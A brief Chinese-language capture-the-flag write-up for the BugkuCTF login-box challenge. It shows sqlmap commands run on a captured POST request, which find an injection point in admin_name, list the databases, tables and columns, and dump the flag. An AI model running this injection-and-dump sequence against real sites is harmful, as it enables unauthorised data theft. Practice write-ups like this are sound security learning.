BugkuCTF 这是一个神奇的登陆框

post注入 直接跑sqlmap吧

抓包到本地

sqlmap.py -r "C:\Users\联想\Desktop\1.txt"

admin_name存在注入点

查数据库

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tables

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 --columns

sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 -T flag1 -C flag1 --dump

得到flag